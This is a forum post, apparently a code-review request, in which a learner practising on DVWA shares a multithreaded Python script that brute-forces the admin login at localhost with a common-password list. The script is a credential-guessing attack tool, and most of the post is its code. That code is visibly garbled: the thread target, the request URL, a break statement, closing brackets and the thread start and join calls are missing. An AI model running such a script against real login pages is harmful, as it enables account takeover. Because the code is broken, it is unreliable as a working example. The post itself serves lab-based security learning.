I am learning infosec with DVWA (Damn Vulnerable Web Application). At first I've decided to write something to brute force admin login screen. I've downlaoded a list of most commonly used passwords and created a script which takes them and attempts to log in. What do you think of it, what could be improved?
#!/usr/bin/env python3
import threading
import requests
URL = 'http://localhost/login.php'
PASSWORD_FILE_NAME = 'common-passwords.txt'
entry_found = False
def create_threads(passwords):
password_list_split_points = [
(0, len(passwords) // 4),
(len(passwords) // 4 + 1, len(passwords) // 2),
(len(passwords) // 2 + 1, 3 * (len(passwords) // 4)),
(3 * (len(passwords) // 4) + 1, len(passwords) - 1),
thread_list = [threading.Thread(
passwords[split_point[0] : split_point[1]]
) for split_point in password_list_split_points]
return thread_list
def run_cracker(*passwords):
global entry_found
for password in passwords:
if entry_found:
# Passwords still contain last \n char which has to be stripped.
if crack_password(password.rstrip()):
# This is set to True only once. No need for sync mechanisms.
entry_found = True
def crack_password(password):
print('[*] Trying password: "{}" ...'.format(password))
response = requests.post(
data={'username': 'admin', 'Login': 'Login', 'password': password}
if bytes('Login failed', encoding='utf-8') not in response.content:
print('[*] Login successful for username: {} password: {}'.format(
'admin', password
return True
return False
if __name__ == '__main__':
with open(PASSWORD_FILE_NAME) as password_file:
passwords = password_file.readlines()
thread_list = create_threads(passwords)
for thread in thread_list:
print('[*] Running thread: {}.'.format(thread.getName()))
for thread in thread_list:
print('[*] Wating for {} to join.'.format(thread.getName()))